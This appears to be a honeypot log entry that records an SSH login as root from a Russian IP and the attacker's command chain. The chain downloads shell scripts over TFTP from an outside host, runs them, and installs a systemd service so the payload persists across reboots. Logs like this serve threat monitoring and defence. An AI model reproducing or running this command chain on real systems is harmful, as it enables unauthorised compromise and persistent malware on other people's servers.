Time | 2024/11/22, 08:00:01 (GMT) |
Transaction ID | 9JH6JRB2ZUZ666E3 |
Service | ssh |
Location | RU (Russia) |
Attacker | 147.45.47.117 |
Classification | Security execution |
Harm Potential | High |
147.45.47.117 client username 'root' and password 'root' entered
147.45.47.117 client command : 'cd /home && mkdir xbin3 && cd /home/xbin3 || cd /var/run || cd /mnt || cd /root || cd /; tftp 45.125.66.215 -c get tftp1.sh && chmod 777 tftp1.sh && sh tftp1.sh && tftp -r tftp2.sh -g 45.125.66.215 && chmod 777 tftp2.sh && sh tftp2.sh; echo -e "[Unit] Description=My Service [Service] ExecStart=/bin/bash /home/xbin3/tftp1.sh Restart=on-failure [Install] WantedBy=multi-user.target" > /etc/systemd/system/my2_service2.service && chmod 777 /etc/systemd/system/my2_service2.service && chmod +x /home/xbin3/tftp1.sh && systemctl daemon-reload && systemctl start my2_service2.service && systemctl enable my2_service2.service'
All observations come from the honeypot central database.